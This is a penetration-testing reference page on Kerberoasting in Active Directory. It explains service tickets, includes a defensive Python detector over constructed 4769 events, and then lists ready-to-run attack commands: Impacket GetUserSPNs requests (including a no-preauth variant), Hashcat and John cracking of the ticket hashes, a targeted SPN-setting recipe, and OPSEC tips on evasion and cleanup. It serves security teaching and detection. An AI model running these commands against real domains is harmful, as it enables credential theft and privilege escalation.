Kerberoasting
OPSEC: Kerberoasting is a very silent attack; only one logged entry is created when requesting the ST (Event ID 4769). There are typically thousands of those events on a DC per day.
Kerberoasting is an attack on Service Tickets (STs) and Service Principal Names (SPNs). SPNs are unique IDs that Kerberos uses to map a service instance, for example MySQL, to a service sign-in account, such as svc_mysql, in whose (often privileged) context the service runs. The ST is encrypted with the service account's NTLM hash, so it can potentially be cracked offline. Any domain user can request an ST from the DC for any account that has an SPN.
Accounts like krbtgt, machine accounts (e.g. dc01$), and (g)MSAs are usually resistant because their passwords are long and complex.
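Because the only trace is a 4769 event buried among thousands per day, detection on the defender's side has to be a filter over those events rather than an alert on any single one. The following added example (not from the original page) scores constructed 4769 records on two signals: an RC4 (0x17) ticket issued for a non-machine, non-krbtgt account, and one requester fetching many distinct SPN tickets within a few minutes. The field names and sample accounts are assumptions for the demo.

```python
"""Spot likely Kerberoasting in Windows Security event 4769 records.

Two signals: (1) service tickets encrypted with RC4 (0x17) for accounts that
are not machine accounts or krbtgt, and (2) a single requester asking for many
distinct SPN tickets in a short window. All events below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample 4769 fields: time, requesting account, service name, ticket etype
SAMPLE_4769 = [
    {"time": "2024-03-01T09:00:01", "user": "alice@CORP.LOCAL", "service": "dc01$", "etype": "0x12"},
    {"time": "2024-03-01T09:00:02", "user": "alice@CORP.LOCAL", "service": "krbtgt", "etype": "0x12"},
    {"time": "2024-03-01T09:05:10", "user": "bob@CORP.LOCAL", "service": "svc_mysql", "etype": "0x17"},
    {"time": "2024-03-01T09:05:11", "user": "bob@CORP.LOCAL", "service": "svc_sql", "etype": "0x17"},
    {"time": "2024-03-01T09:05:12", "user": "bob@CORP.LOCAL", "service": "svc_web", "etype": "0x17"},
    {"time": "2024-03-01T09:05:13", "user": "bob@CORP.LOCAL", "service": "svc_backup", "etype": "0x17"},
    {"time": "2024-03-01T10:30:00", "user": "carol@CORP.LOCAL", "service": "svc_mysql", "etype": "0x12"},
]

RC4_ETYPE = "0x17"  # Ticket Encryption Type value for RC4-HMAC in event 4769

def is_roastable_target(service):
    # Machine accounts (name$) and krbtgt have long random passwords; skip them.
    return not service.endswith("$") and service.lower() != "krbtgt"

def rc4_requests(events):
    """Events where a user account's ST was issued with RC4, i.e. cheap to crack offline."""
    return [e for e in events if e["etype"] == RC4_ETYPE and is_roastable_target(e["service"])]

def spray_requesters(events, window=timedelta(minutes=5), threshold=3):
    """Requesters that asked for at least `threshold` distinct roastable SPNs within `window`."""
    by_user = defaultdict(list)
    for e in events:
        if is_roastable_target(e["service"]):
            by_user[e["user"]].append((datetime.fromisoformat(e["time"]), e["service"]))
    flagged = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            names = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(names) >= threshold:
                flagged[user] = sorted(names)
                break
    return flagged

if __name__ == "__main__":
    for e in rc4_requests(SAMPLE_4769):
        print("RC4 ST issued for user account:", e["service"], "requested by", e["user"])
    for user, spns in spray_requesters(SAMPLE_4769).items():
        print(f"{user} requested {len(spns)} distinct SPNs within 5 minutes: {spns}")
```

In a real deployment the same two filters run over 4769 events exported from the DC, with the RC4 signal being the stronger one in domains that have moved service accounts to AES.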

Tools
Find and attack user accounts used as service accounts with Impacket:
sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 <domain>/<user> -outputfile <fileName>
# Kerberoast without valid credentials: use an account that does not require Kerberos pre-authentication (-no-preauth) to request STs for the users listed in domain_users
sudo impacket-GetUserSPNs -no-preauth jjones -usersfile domain_users -dc-host 10.10.11.231 rebound.htb/ -outputfile kerb.txt
If time sync errors occur, i.e., KRB_AP_ERR_SKEW (Clock skew too great):
sudo ntpdate <dc-ip>
The krb5tgs hashes can be cracked offline using Hashcat or JtR:
# Crack the hashes using Hashcat
sudo hashcat -m 13100 hashes.kerberoast rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
# Crack the hashes using John the Ripper
.\john.exe --wordlist=<wordlist> hashes.kerberoast
Targeted Kerberoast
If we have GenericWrite or GenericAll on a user object, we can set an SPN on that user account and then extract and crack the TGS.
OPSEC: Clean up by removing the SPN afterwards.
Set an SPN for the target user (it must be unique within the forest) using PowerView or the ActiveDirectory module:
# PowerView
Set-DomainObject -Identity <targetUser> -Set @{serviceprincipalname='<serviceName>/<randomString>'}
# AD module
Set-ADUser -Identity <targetUser> -ServicePrincipalNames @{Add='<serviceName>/<randomString>'}